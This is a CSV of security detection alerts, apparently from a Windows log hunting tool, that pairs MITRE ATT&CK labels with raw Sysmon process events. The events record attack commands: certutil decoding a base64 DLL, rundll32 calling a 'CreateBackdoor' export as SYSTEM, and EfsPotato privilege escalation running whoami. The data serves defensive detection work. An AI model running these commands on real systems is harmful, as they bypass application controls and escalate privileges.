"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
</TimeCreated>
<EventRecordID>4890</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
<Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
<Data Name=""ProcessId"">700</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil -f -decode fi.b64 AllTheThings.dll </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
<Data Name=""ParentProcessId"">3184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
</TimeCreated>
<EventRecordID>243512</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
<Data Name=""ProcessId"">4848</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T12:08:19.915120Z"">
</TimeCreated>
<EventRecordID>5447</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 12:08:19.888</Data>
<Data Name=""ProcessGuid"">747F3D96-7933-5D45-0000-0010227E0701</Data>
<Data Name=""ProcessId"">6000</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-7930-5D45-0000-001055DE0601</Data>
<Data Name=""ParentProcessId"">4740</Data>
<Data Name=""ParentImage"">C:\Windows\System32\consent.exe</Data>
<Data Name=""ParentCommandLine"">consent.exe 896 318 0000028064471300</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
</TimeCreated>
<EventRecordID>243512</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
<Data Name=""ProcessId"">4848</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
</TimeCreated>
<EventRecordID>243512</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
<Data Name=""ProcessId"">4848</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /groups) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:48.359432Z"">
</TimeCreated>
<EventRecordID>17717</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:48.342</Data>
<Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-0010F76F1300</Data>
<Data Name=""ProcessId"">3964</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /groups</Data>
<Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
<Data Name=""LogonId"">0x13587</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
<Data Name=""ParentProcessId"">2016</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /groups ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:48.359432Z"">
</TimeCreated>
<EventRecordID>17717</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:48.342</Data>
<Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-0010F76F1300</Data>
<Data Name=""ProcessId"">3964</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /groups</Data>
<Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
<Data Name=""LogonId"">0x13587</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
<Data Name=""ParentProcessId"">2016</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /priv) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-10T13:33:29.424885Z"">
</TimeCreated>
<EventRecordID>15678</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1948"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-10 13:33:29.409</Data>
<Data Name=""ProcessGuid"">365ABB72-7DA9-5CD5-0000-00100ED31400</Data>
<Data Name=""ProcessId"">2524</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami /priv</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-79DF-5CD5-0000-0020F8410100</Data>
<Data Name=""LogonId"">0x141f8</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-7D86-5CD5-0000-0010CC2E1400</Data>
<Data Name=""ParentProcessId"">2076</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-22T19:33:38.905645Z"">
</TimeCreated>
<EventRecordID>1912935</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4760"" ThreadID=""6844"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-22 19:33:38.890</Data>
<Data Name=""ProcessGuid"">00247C92-A692-6122-0000-0010A5CD1F02</Data>
<Data Name=""ProcessId"">11328</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.19041.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\WINDOWS\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">00247C92-7087-6122-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">00247C92-A691-6122-0000-001021C31F02</Data>
<Data Name=""ParentProcessId"">14048</Data>
<Data Name=""ParentImage"">C:\temp\EfsPotato.exe</Data>
<Data Name=""ParentCommandLine"">c:\temp\EfsPotato.exe whoami</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil -f -decode fi.b64 AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:58.659405Z"">
</TimeCreated>
<EventRecordID>4888</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:58.614</Data>
<Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
<Data Name=""ProcessId"">3184</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-10T13:32:58.549885Z"">
</TimeCreated>
<EventRecordID>15677</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1980"" ThreadID=""1948"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-10 13:32:54.034</Data>
<Data Name=""ProcessGuid"">365ABB72-7D86-5CD5-0000-0010CC2E1400</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-79DF-5CD5-0000-0020F8410100</Data>
<Data Name=""LogonId"">0x141f8</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-7D85-5CD5-0000-001047061400</Data>
<Data Name=""ParentProcessId"">2536</Data>
